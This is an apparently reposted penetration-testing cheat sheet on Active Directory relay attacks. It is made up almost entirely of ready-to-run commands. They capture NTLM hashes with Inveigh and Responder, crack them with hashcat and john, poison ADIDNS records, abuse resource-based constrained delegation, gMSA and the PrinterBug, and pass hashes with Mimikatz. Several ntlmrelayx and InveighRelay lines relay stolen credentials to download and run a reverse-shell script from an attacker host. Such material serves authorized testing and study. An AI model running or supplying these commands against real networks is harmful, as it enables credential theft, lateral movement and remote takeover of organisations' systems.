Relay Attacks - Active Directory Penetration Testing
2021-09-02 02:36:00 Author: www.hackingdream.net(查看原文) 阅读量:213 收藏

#Relay attacks - Capturing SMB hashes 

Import-Module .\Inveigh.ps1#Start collecting hashes, we will see hashes whenever a user tries to access something non-existant via SMB
Invoke-Inveigh -ConsoleOutput Y#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
Relay Attack using Responder 

sudo python /usr/share/responder/Responder.py -I tun0 -A 
git clone https://github.com/dirkjanm/krbrelayx.git

#adding a DNS Record
sudo python3 dnstool.py -u 'steins.local\username' -p 'P@ssw0rd!' -a add -r 'application.steins.local' -d ATTACKER_IP SERVER_IP

#wait for the victim to access our dns record :) you will get the user's NTLv2 Hash in responder

#crack the hash with john
john --format=netntlmv2 hash --wordlist=wordlist.txt
Abusing ADIDNS and Relaying the Hashes

Import-module .\Invoke-DNSUpdate.ps1
Powershell Invoke-DNSupdate -DNSType A -DNSName test -DNSData 192.168.21.10 -VerboseImport-module .\Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Tombstone -Verbose
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose#Capture all the users hashes
Import-module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y#Relaying the hashes for command execution
Import-module .\InveighRelay.ps1
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.2.1 -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10:/rev.ps1')"
Resource Based Constrained Delegation on MSSQL Server 

#Add a DNS Record using
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local#Login to the MSSQL Server and run xpdritree on the dnsname u just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
#on your Kali box, run
rbcd_relay.py
msDS-AllowedToActOnBehalfOfOtherIdentity is added to object SQL_server4$ for object USER
sudo proxychains python rbcd_relay.py 192.168.1.2 steins.local SQL_server4$ USER#View the privileges of the user Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,Principalsallowedtodelegatetoaccount,msds-allowedtodelegateto,trustedtoauthfordelegation #Get TGT and gain access to the server
proxychains python3 ./getST.py -dc-ip 192.168.2.1 -spn cifs/server.steibslocal -impersonate sql_admin steins.local/sql_user:Password@123 export KRB5CCNAME=sql_admin.ccache;sudo proxychains psexec.py user/[email protected] -k -no-pass -dc-ip 192.168.2.10 -target-ip 192.168.2.1OR .\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /pttdir \\server.steins.local\c$psexec \\server.steins.local cmd.exe
Abusing GMSA by relaying 

Import-Module .\Invoke-DNSUpdate.ps1
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData Attacker_IP -Realm steins.local#Invoke a web request from the service that is using GMSA
Invoke-WebRequest -uri "http://might.steins.local" -UseDefaultCredentials#Start capturing the data using ntlmrelayx, if its running as administraor SAM hashes will be dumped
sudo proxychains ntlmrelayx.py --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://GMSA_running_machine_IP#incase the data is shown as Password blob, you can use below to convert it to ntlm hash
(ConvertFrom-ADManagedPasswordBlob <blob>).SecureCurrentPassword | ConvertTo-NTHash OR if the user can read GMSA Passwords, you can use gMSADumper.py to dump the hashes python3 gMSADumper.py -u 'USERNAME' -p 'P@SSW0RD!' -d 'steins.local' -l 'dc.steins.local'
Abusing PrinterBug

#find machines with unconstrained Delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -ewq $True}#Compromise and login to the machine with unconstrained Delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'

#Run SampleSpool.exe on the unconstrianed degelation enabled machine


SpoolSample.exe TARGET_DOMAIN_FQDN UNCONSTRAINED_DOMAIN_FQDNOR proxychains python3 printerbug.py steins.local/[email protected] KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'sudo proxychains ntlmrelayx.py -t smb://192.168.1.1 -smb2support
Abusing ADIDNS to Send traffic to the target 

#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose

#assign permissions to the ADIDNS
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
Capturing Hashes using responder and cracking hashes 

sudo proxychains responder -I tun0 -v  

hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force 
Relaying using ntlmrelayx

# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory 
# -c: execute the command 
# -e: execute a binary

ntlmrelayx can automatically dump hashes, when it can access an administrator account. 
so, lookout for the hashes in the output. Also Impacket 0.9.23-dev version has issues with ntlmrelay. better use the stable version.
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support


Useful commands

sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support

sudo proxychains ntlmrelayx.py -t  smb://10.10.10.10 -l loot -i  -smb2support -c  "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.102:8000/powerrev.ps1')" 

#Target a specific user on a specific target
sudo proxychains ntlmrelayx.py -t smb://[email protected] -smb2support 
Using Inveigh to Capture Hashes

Import-Module .\Inveigh.ps1

#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo  

#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)

Invoke-Inveigh -ConsoleOutput Y -adidns combo  -ADIDNSCredential $Cred -ADIDNSDomain  192.168.2.10 

Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10


#Capturing Hashes on the target 
Invoke-Inveigh -ConsoleOutput Y -DNS Y 

#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r  /usr/share/hashcat/rules/d3ad0ne.rule


#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.21.155 -ShowHelp N -StatusOutput N -Command  "powershell.exe -c whoami"

文章来源: https://www.hackingdream.net/2021/09/relay-attacks-active-directory-pentest.html
如有侵权请联系:admin#unsafe.sh